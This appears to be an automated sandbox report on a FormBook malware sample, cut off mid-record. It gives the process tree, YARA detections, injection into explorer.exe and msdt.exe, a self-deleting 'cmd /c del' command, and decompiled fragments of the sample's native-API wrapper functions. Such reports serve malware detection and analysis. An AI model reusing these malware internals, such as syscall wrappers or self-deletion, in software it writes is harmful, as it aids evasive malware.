Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage


                                                  Memory Usage


                                                  High Level Behavior Distribution


                                                  Behavior


                                                  System Behavior

General

Start time: 19:45:59
Start date: 13/10/2021
Path: C:\Users\user\Desktop\divpCHa0h7.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\divpCHa0h7.exe'
Imagebase: 0x690000
File size: 477696 bytes
MD5 hash: FDA0D823B262AC2B1BD76A2053C29692
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x140000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x3a0000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:19:46:09
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x400000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:19:46:10
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff693d90000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:19:46:52
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                  Imagebase:0x2f0000
                                                  File size:1508352 bytes
                                                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:19:46:55
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
                                                  Imagebase:0x150000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:19:46:56
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis


                                                    Executed Functions

                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 04F90D1D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C630
                                                    • GetCurrentThread.KERNEL32 ref: 0106C66D
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C6AA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0106C703
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C630
                                                    • GetCurrentThread.KERNEL32 ref: 0106C66D
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C6AA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0106C703
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A516
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0

                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F90B8A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0

                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F930F1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C87F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C87F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A591,00000800,00000000,00000000), ref: 0106A7A2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A591,00000800,00000000,00000000), ref: 0106A7A2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0

                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 04F90D1D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A516
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 26a4d94c5bcb03906b9d07fc2a59e560896bffccfbfe9c5403cc766d72c3b524
                                                    • Instruction ID: 12236e98c5debf60e0bb1183b3249b1ee787124a3953d98dd7ad99903f97255c
                                                    • Opcode Fuzzy Hash: 26a4d94c5bcb03906b9d07fc2a59e560896bffccfbfe9c5403cc766d72c3b524
                                                    • Instruction Fuzzy Hash: 6E1113B1D003498FDB20DF9AC444BDEFBF8EB88224F14841AD469B7200C374A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 04F90D1D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: aa5f8b762db7609bc355bf9bd32e7dd98aaf0397f4943fec09f412236530f8d2
                                                    • Instruction ID: 126a6d000aa597691bf37f1ac7b5dd5170cb60d3647d76e72537ebad6009f901
                                                    • Opcode Fuzzy Hash: aa5f8b762db7609bc355bf9bd32e7dd98aaf0397f4943fec09f412236530f8d2
                                                    • Instruction Fuzzy Hash: 1E1100B58002499FDB20CF99D588BDEFBF8EB48324F24841AE915A3300C774A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06d01f5604b93e696f7ffe703d501f78f5820792a787d3aa1b0b8dd58a6ded4c
                                                    • Instruction ID: 7ac093b107972094ec58b9dd1dd94f695adaa623275430788a8be5ab218afa2f
                                                    • Opcode Fuzzy Hash: 06d01f5604b93e696f7ffe703d501f78f5820792a787d3aa1b0b8dd58a6ded4c
                                                    • Instruction Fuzzy Hash: B012E5F9C917468AD312DF65F8981897BA1F746328BD06A0CC2613AAE1D7BC117ECF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e11d3035f5cd488fb6ab57c5686bbcafadfe1c9d43136070466c563da91a8bd
                                                    • Instruction ID: 889cb9b550320d76e88f43552508d89c295a52a68d5da8dadc7777304d261a8c
                                                    • Opcode Fuzzy Hash: 4e11d3035f5cd488fb6ab57c5686bbcafadfe1c9d43136070466c563da91a8bd
                                                    • Instruction Fuzzy Hash: 1DA19B36E0071ADFCF05CFA5C8445DEBBF6FF88300B1585AAE945AB220EB71A955CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2de5c8ccf4068a82bd74d050fd76be00ee0073dd2fd04cfa0a2858916105c1e1
                                                    • Instruction ID: ccf99120f7ae02e64a77cfa0f53d062cae70823d421ee7b64afd31ddfabbe6ef
                                                    • Opcode Fuzzy Hash: 2de5c8ccf4068a82bd74d050fd76be00ee0073dd2fd04cfa0a2858916105c1e1
                                                    • Instruction Fuzzy Hash: 49C146B9C917468AD712DF65F8881897B61FB9A328F905A0CD1213BAD1D7BC107ECF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    C-Code - Quality: 37%
                                                    			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                    				void* _t18;
                                                    				void* _t27;
                                                    				intOrPtr* _t28;
                                                    
                                                    				_t13 = _a4;
                                                    				_t28 = _a4 + 0xc48;
                                                    				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                    				_t4 =  &_a40; // 0x413a41
                                                    				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                                    				return _t18;
                                                    			}

                                                    APIs
                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: A:A
                                                    • API String ID: 2738559852-2859176346
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 50%
                                                    			E0041871A(intOrPtr _a4, void* _a8) {
                                                    				long _t8;
                                                    				void* _t11;
                                                    
                                                    				asm("repne daa");
                                                    				asm("in al, dx");
                                                    				asm("popad");
                                                    				asm("loope 0x35");
                                                    				_t5 = _a4;
                                                    				_t2 = _t5 + 0x10; // 0x300
                                                    				_t3 = _t5 + 0xc50; // 0x409773
                                                    				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                    				_t8 = NtClose(_a8); // executed
                                                    				return _t8;
                                                    			}

                                                    APIs
                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                                    • Instruction ID: 9a256857486c6b04dc2d8d01bbab50f47954425687f1d86c7330f0437a7ebe71
                                                    • Opcode Fuzzy Hash: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                                    • Instruction Fuzzy Hash: E5014876200208BBDB14DF99CC85EEB77A9EF88314F118559BA18AB242C630E9548BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00409B50(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
                                                    				char* _v8;
                                                    				struct _EXCEPTION_RECORD _v12;
                                                    				struct _OBJDIR_INFORMATION _v16;
                                                    				char _v536;
                                                    				void* _t15;
                                                    				struct _OBJDIR_INFORMATION _t17;
                                                    				struct _OBJDIR_INFORMATION _t18;
                                                    				void* _t31;
                                                    				void* _t32;
                                                    				void* _t33;
                                                    				void* _t34;
                                                    				void* _t35;
                                                    
                                                    				_t32 = __esi;
                                                    				_t31 = __edi;
                                                    				_v8 =  &_v536;
                                                    				_t15 = E0041AF80( &_v12, 0x104, _a8);
                                                    				_t34 = _t33 + 0xc;
                                                    				if(_t15 != 0) {
                                                    					_t17 = E0041B3A0(__eflags, _v8);
                                                    					_t35 = _t34 + 4;
                                                    					__eflags = _t17;
                                                    					if(_t17 != 0) {
                                                    						E0041B620(__ebx,  &_v12, 0);
                                                    						_t35 = _t35 + 8;
                                                    					}
                                                    					_t18 = E00419730(_t31, _t32, _v8);
                                                    					_v16 = _t18;
                                                    					__eflags = _t18;
                                                    					if(_t18 == 0) {
                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                    						return _v16;
                                                    					}
                                                    					return _t18;
                                                    				} else {
                                                    					return _t15;
                                                    				}
                                                    			}

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004185EB(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				void* _v117;
                                                    				long _t27;
                                                    				void* _t38;
                                                    
                                                    				_t21 = _a4;
                                                    				_t6 = _t21 + 0xc40; // 0xc40
                                                    				E004191F0(_t38, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                    				_t27 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t27;
                                                    			}

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                                    • Instruction ID: eadccef6660383827a1c39e062733e9e7291f8de244501940662f3f68da9609a
                                                    • Opcode Fuzzy Hash: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                                    • Instruction Fuzzy Hash: B501AFB2245108AFCB08CF99DC95EEB77A9AF8C354F158248FA1D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				long _t21;
                                                    				void* _t31;
                                                    
                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                    				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t21;
                                                    			}

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004187CA(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t17;
                                                    				void* _t28;
                                                    
                                                    				_t13 = _a4;
                                                    				_t4 = _t13 + 0xc60; // 0xca0
                                                    				E004191F0(_t28, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                    				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t17;
                                                    			}

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                                    • Instruction ID: baafc16d0dcc65a97a2a7081ec653fa0cdbc2bd5867fea8e6554ff1b4ee91aef
                                                    • Opcode Fuzzy Hash: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                                    • Instruction Fuzzy Hash: B9F08CB2200108AFDB14DF88CC80EEB73ACFF88304F108149FE4997241C630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t14;
                                                    				void* _t21;
                                                    
                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                    				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t14;
                                                    			}

                                                    APIs
